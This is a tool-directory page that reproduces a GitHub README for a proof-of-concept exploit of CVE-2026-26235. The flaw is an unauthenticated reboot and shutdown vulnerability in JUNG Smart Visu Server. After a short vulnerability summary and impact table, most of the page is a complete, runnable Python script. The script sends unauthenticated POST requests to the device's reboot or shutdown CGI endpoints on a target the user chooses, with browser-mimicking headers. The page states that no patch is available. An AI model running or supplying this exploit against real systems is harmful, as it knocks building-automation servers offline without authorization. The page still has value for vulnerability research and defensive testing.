Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacyΒ© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-26235-JUNG-Smart-Visu-Server-Unauthenticated-Reboot-Shutdown β€” Proof-of-concept exploit for CVE-2026-26235, an unauthenticated denial-of-service vulnerability in JUNG Smart Visu Server <=1.1.1050, allowing remote reboot or shutdown via exposed CGI endpoints. | Kitploit
Tools/GitHubGitHub/mbanyamer/cve-2026-26235-jung-smart-visu-server-unauthenticated-reboot-shutdown
IoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubmbanyamer/cve-2026-26235-jung-smart-visu-server-unauthenticated-reboot-shutdown

CVE-2026-26235-JUNG-Smart-Visu-Server-Unauthenticated-Reboot-Shutdown

Proof-of-concept exploit for CVE-2026-26235, an unauthenticated denial-of-service vulnerability in JUNG Smart Visu Server <=1.1.1050, allowing remote reboot or shutdown via exposed CGI endpoints.

Most Popular

View all β†’

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools β†’
Share
View Repository
227 months agoNot yet reviewed

πŸ‘€ Author

Mohammed Idrees Banyamer

  • πŸ“ Country: Jordan
  • πŸ“Έ Instagram: @banyamer_security

Python Version CVE CVSS CWE Author

Proof-of-Concept exploit for CVE-2026-26235 - Unauthenticated Denial of Service via missing authentication in JUNG Smart Visu Server ≀ 1.1.1050.


🚨 Vulnerability Description

CVE-2026-26235 is an unauthenticated denial of service vulnerability in JUNG Smart Visu Server versions ≀ 1.1.1050. The product fails to implement authentication for critical system management functions, allowing remote attackers to reboot or shut down the server with a single POST request.

The endpoints /cgi-bin/reboot.sh and /cgi-bin/shutdown.sh are exposed without any authentication checks. No session tokens, API keys, or credentials are required to trigger these system-level commands.

This allows:

  • Unauthenticated system reboot/shutdown
  • No user interaction required
  • Complete service disruption
  • Persistent denial of service

🎯 Affected Versions

StatusVersion
❌ VulnerableJUNG Smart Visu Server ≀ 1.1.1050
βœ… PatchedNot yet released

Tested on: JUNG Smart Visu Server 1.1.1050, Embedded Linux


πŸ’₯ Impact

VectorDescription
CVSS v48.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
AuthenticationNone - Completely unauthenticated
Attack VectorNetwork
ComplexityLow
ImpactHigh Availability Impact

πŸ”¬ Technical Details

Root Cause

  1. Missing authentication - CWE-306: The product does not perform any authentication for critical system functions
  2. Exposed CGI endpoints - /cgi-bin/reboot.sh and /cgi-bin/shutdown.sh are publicly accessible
  3. No session validation - No cookie, token, or credential verification occurs
  4. Direct system command execution - CGI scripts execute system reboot/shutdown commands without privilege checks

Vulnerability Flow

Attacker β†’ POST /cgi-bin/reboot.sh β†’ No Authentication Check β†’ System Reboot β†’ DoS
Attacker β†’ POST /cgi-bin/shutdown.sh β†’ No Authentication Check β†’ System Shutdown β†’ DoS

πŸ› οΈ Proof of Concept

Python Exploit Script

#!/usr/bin/env python3
# Exploit Title: JUNG Smart Visu Server - Unauthenticated Remote Reboot/Shutdown
# CVE: CVE-2026-26235
# Date: 2026-02-12
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/banyamer-security
# Vendor Homepage: https://www.jung.de
# Software Link: https://www.jung.de/smart-visu-server
# Vulnerable: JUNG Smart Visu Server <= 1.1.1050
# Tested on: JUNG Smart Visu Server 1.1.1050
# Category: Web Application
# Platform: Embedded/Linux
# Exploit Type: Missing Authentication (CWE-306)

import requests
import sys
import argparse
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def print_banner():
    print("\n" + "="*60)
    print(" JUNG Smart Visu Server - Unauthenticated Reboot/Shutdown PoC")
    print(" CVE-2026-26235 | CWE-306")
    print("="*60 + "\n")

def exploit(target, action="reboot", verify_ssl=False, timeout=10):
    endpoints = {
        "reboot": "/cgi-bin/reboot.sh",
        "shutdown": "/cgi-bin/shutdown.sh"
    }
    
    if action not in endpoints:
        print(f"[-] Invalid action: {action}. Choose 'reboot' or 'shutdown'.")
        return False
    
    url = f"{target.rstrip('/')}{endpoints[action]}"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1",
        "Cache-Control": "max-age=0",
        "Origin": target.rstrip('/'),
        "Referer": f"{target.rstrip('/')}/",
        "DNT": "1",
        "Sec-GPC": "1"
    }
    
    print(f"[*] Target      : {url}")
    print(f"[*] Action      : {action.upper()}")
    print(f"[*] SSL Verify  : {verify_ssl}")
    print("[*] Sending unauthenticated POST request...\n")
    
    try:
        response = requests.post(
            url, 
            headers=headers,
            data="",  
            verify=verify_ssl,
            timeout=timeout,
            allow_redirects=False
        )
        
        print(f"[+] Request sent successfully!")
        print(f"[+] HTTP Status : {response.status_code}")
        
        if response.status_code == 200:
            print("[!] Server responded with 200 OK - action likely executed")
        elif response.status_code == 302 or response.status_code == 301:
            print("[!] Server responded with redirect - action may have been triggered")
        else:
            print(f"[?] Unexpected response code: {response.status_code}")
        
        if response.text:
            print(f"[*] Response preview: {response.text[:200].strip()}")
        
        print("\n[!] If successful, the target server should now be restarting or shutting down.")
        return True
        
    except requests.exceptions.Timeout:
        print("[-] Connection timeout. The server may be down or unreachable.")
        print("[*] This could indicate successful DoS if the server was previously reachable.")
        return True
    except requests.exceptions.ConnectionError as e:
        print(f"[-] Connection error: {e}")
        print("[*] The server may have gone down - possibly successful exploitation.")
        return True
    except Exception as e:
        print(f"[-] An error occurred: {e}")
        return False

def main():
    print_banner()
    
    parser = argparse.ArgumentParser(
        description="PoC for CVE-2026-26235 - JUNG Smart Visu Server Unauthenticated Reboot/Shutdown"
    )
    parser.add_argument(
        "target",
        help="Target server URL (e.g., https://192.168.1.100:8080)"
    )
    parser.add_argument(
        "-a", "--action",
        choices=["reboot", "shutdown"],
        default="reboot",
        help="Action to perform: reboot or shutdown (default: reboot)"
    )
    parser.add_argument(
        "-k", "--insecure",
        action="store_false",
        dest="verify_ssl",
        default=False,
        help="Disable SSL certificate verification (default: disabled)"
    )
    parser.add_argument(
        "-t", "--timeout",
        type=int,
        default=10,
        help="Request timeout in seconds (default: 10)"
    )
    
    args = parser.parse_args()
    
    print(f"[*] Starting exploit against: {args.target}\n")
    
    success = exploit(
        target=args.target,
        action=args.action,
        verify_ssl=args.verify_ssl,
        timeout=args.timeout
    )
    
    if success:
        print("\n[+] Exploit completed successfully.")
    else:
        print("\n[-] Exploit failed.")
        sys.exit(1)

if __name__ == "__main__":
    main()
Download Tool